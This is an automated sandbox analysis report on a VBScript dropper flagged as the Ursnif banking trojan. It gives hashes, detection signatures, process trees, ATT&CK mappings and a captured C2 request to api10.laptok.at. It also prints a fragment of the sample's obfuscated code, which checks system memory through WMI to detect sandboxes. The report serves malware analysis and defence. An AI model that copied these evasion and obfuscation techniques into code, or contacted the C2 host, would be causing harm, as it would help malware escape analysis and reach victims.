
Analysis Report WoXAp0Q0zaNl.vbs

Overview

General Information

Sample Name: WoXAp0Q0zaNl.vbs
Analysis ID: 283989
MD5: baa0a7597d2ebb9199a1e679dc96ea41
SHA1: bf2593d95a4b948cc702be4863dd994744e68033
SHA256: 23b57a9859e8c6d0f851ec43eef95689cd728e4b64087e2222f47158bf40bbb5

Most interesting Screenshot:

Detection

Ursnif
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
WScript reads language and country specific registry keys (likely country aware script)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 7044 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 456 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 7052 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
(4 further entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\digram.it | Virustotal: Detection: 23%
Source: C:\Users\user\AppData\Local\Temp\digram.it | ReversingLabs: Detection: 16%
Multi AV Scanner detection for submitted file
Source: WoXAp0Q0zaNl.vbs | Virustotal: Detection: 21%
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: global traffic | HTTP traffic detected:
  GET /api1/YXIIEbjr/LKHsOdzDIb6srGqE_2F2Er6/HCbOtaiM62/3Ar3CmbW41bZrpoR_/2BGysJ7tJIut/_2BFAukfihC/tpgdEs38KtyYHo/kktDpMw4OLyq38u7ZBnvv/42Welbey1DQFDT5_/2BD_2F2IHF2O0r1/yrQwG6dWZ8DmHPk7oN/EbhuDrivI/J_2B_2BFq9IFGp8_2BI_/2FCylN_2BEo819KSTwa/0MXm2M1VxU28J3cJ4ol9MT/sZwPzVemSBoyC/1Lvtf_2B/yGj2SU2fE7V0Oth_2Foz_0A/_0DFm2ouNB/hfL_2Baahr1huA43q/Z1YUxW6qUxNZ/H_2B5MCMqWQ/nJi24tA8M_2Fov/zPX5bTYz9z/ohH HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml1.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x46bd4534,0x01d687be</date><accdate>0x46bd4534,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml6.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x46c209ca,0x01d687be</date><accdate>0x46c209ca,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml8.19.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x46c46c38,0x01d687be</date><accdate>0x46c46c38,0x01d687be</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Server: nginx
  Date: Thu, 10 Sep 2020 13:03:25 GMT
  Content-Type: text/html; charset=utf-8
  Transfer-Encoding: chunked
  Connection: close
  Vary: Accept-Encoding
  Content-Encoding: gzip
  Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
  Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: msapplication.xml.19.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml2.19.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml3.19.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml4.19.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml5.19.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml6.19.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml7.19.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml8.19.dr | String found in binary or memory: http://www.youtube.com/

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000003.00000003.373451807.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373351834.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373528963.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.448952578.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373309991.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373502610.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373474055.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373392198.0000000005C58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.373420364.0000000005C58000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
(memory dump matches identical to those listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\digram.it A5B0036E0B2C73D3A8F47ED153CAA974EC04A870E06FB5F144C584B58B54DEC9
Source: WoXAp0Q0zaNl.vbs | Initial sample: Strings found which are bigger than 50
Source: classification engine | Classification label: mal96.troj.evad.winVBS@4/24@1/1
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\adobe.url
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: WoXAp0Q0zaNl.vbs | Virustotal: Detection: 21%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\WoXAp0Q0zaNl.vbs'
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:456 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: WoXAp0Q0zaNl.vbs | Static file information: File size 1177208 > 1048576
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Source: Binary string: c:\Rise\75\idea\toward\94\Scale\Live\34\Best\77\25\All\Whose.pdb source: digram.it.0.dr

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.ScriptName, cStr(702240904)) > 0 And Welles682 = 0) ThenExit Function' dutiful irredentist239 scopic Galbreath huckleberry example563 wastage Messiah clientele protozoan role merrymake Casanova alkaloid, circumpolar poesy derelict incapacity Chalmers tuple568 brindle syphilitic nightdress, 7557426 pietism hippodrome varnish Ackley libation chinquapin Daedalus might chiefdom eyeball Samson Chesterton vii buzzy bandwagon Calhoun Lyle formulate McKenzie intimater surpass anew upcome spinneret End IfSet PEpttService = GetObject("winmgmts:\\.\root\cimv2")Set GJkCFmZlItems = PEpttService.ExecQuery("Select * from Win32_ComputerSystem")For Each hgYKL In GJkCFmZlItems' giggle713 doctrinal exchange impunity552 fable Huston clung hatchet367 swallow pickle319 aberrate emigrate columnar behead gardenia extempore340 Cervantes taboo aluminate384 Riordan screw74 poke tenement glutamine oddball175 subservient25 citizenry rakish926 annular spiritual, Lazarus betroth230 nostalgic Seattle Argive sandwich childish wallow. acrobatic ha calamus gaur nighttime concordant thistledown circumcision erratum, interregnum bashful lay195 Vanderpoel apotheosis870 Loire. 1890016 airflow814, Lockhart rebel hegemony auxiliary echo412 joyride onward broil sheepherder deputation workload718 exfoliate Laurent Hans GhbaI = GhbaI + Int((hgYKL.TotalPhysicalMemory) / ((1048658 - 79.0) - (72 + (-(1 + 68.0)))))REM embodiment, Guinevere, Vishnu kneel81 macaque706. burglar debonair ambrose456 lax hydroxyl wholly scuffle. wraith beneath minuscule86 sandpaper bruit parent mound502, televise viscount taxi quaff Archibald whack cohere40. 2161742 conserve shirt891 Hippocratic arc tularemia leeway chase flipflop sailor Blaine Jolla mulligan serve Gibson89 Giovanni. 7282276 opal, 9667674 reb, 278783 pterodactyl. bronze phone984 Aztec phosphate concision oh flake hectic moreover797 despoil tawny degumming hundredfold Next' conciliate advent. 4668633 carnation898 wire, 9922102 quixotic, drive refrigerate371, intricacy Dooley stupor Giuliano open763 county exogenous punctuate ancient Furman stowage vernal478 redshank digress amethystine breakpoint hodgepodge neutral infallible Mycenae oaken amoebae autocratic Carmen quadrangular coypu Edmonds periphrastic inapplicable collaborate penmen Wagner congratulatory messy. 3091313 loot guitar943 If GhbaI < (((276 - 228.0) + (86 + 2760.0)) - 1864.0) Then' freshmen stagnant summit508 Hilbert tarpon tarantula tower252 sukiyaki dutiable Ella drill. 8689681 berry903 dictatorial antiquary dosimeter n949 claim. minima weave, corpuscular poisonous ecology stearic Stafford Fordham intellectual perspicuity telecommunicate310 Evans sapsucker. Wong roommate dexterity. Harlem wastewater Blum. 7341983 wakeup lore faithful invasion428 portrait78 vociferous floc184 tollhouse sourberry, Cretan964 ameliorate Ada. Elmira, primal freeload, beneficent oblate yaw ally Libya fiat daylight, 1604588 statuary candy216 orthodontist819 animadversion cocky stolid symp

Persistence and Installation Behavior:

Creates processes via WMI
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\digram.it

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
(memory dump matches identical to those listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)
Deletes itself after installation
Source: C:\Windows\System32\wscript.exe | File deleted: c:\users\user\desktop\woxap0q0zanl.vbs
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 occurrences)

Malware Analysis System Evasion:

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
WScript reads language and country specific registry keys (likely country aware script)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_CURRENT_USER\Control Panel\International\Geo Nation (4 occurrences)
Source: C:\Windows\System32\wscript.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\digram.it
Source: C:\Windows\System32\wscript.exe TID: 7088 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformation
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\Desktop\desktop.ini
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: wscript.exe, 00000000.00000002.236288354.000001B818AB5000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000002.236500282.000001B818FB0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: digram.it.0.dr
Source: C:\Windows\System32\wscript.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\status.zip VolumeInformation (8 occurrences)
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
(memory dump matches identical to those listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

Remote Access Functionality:

Yara detected Ursnif
(memory dump matches identical to those listed under Key, Mouse, Clipboard, Microphone and Screen Capturing)

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation221 | Path Interception | Process Injection1 | Masquerading11 | OS Credential Dumping | Query Registry1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting121 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion4 | LSASS Memory | Security Software Discovery231 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution1 | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Virtualization/Sandbox Evasion4 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting121 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information1 | LSA Secrets | System Information Discovery124 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | File Deletion1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph

(graph image not included; legend omitted)

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.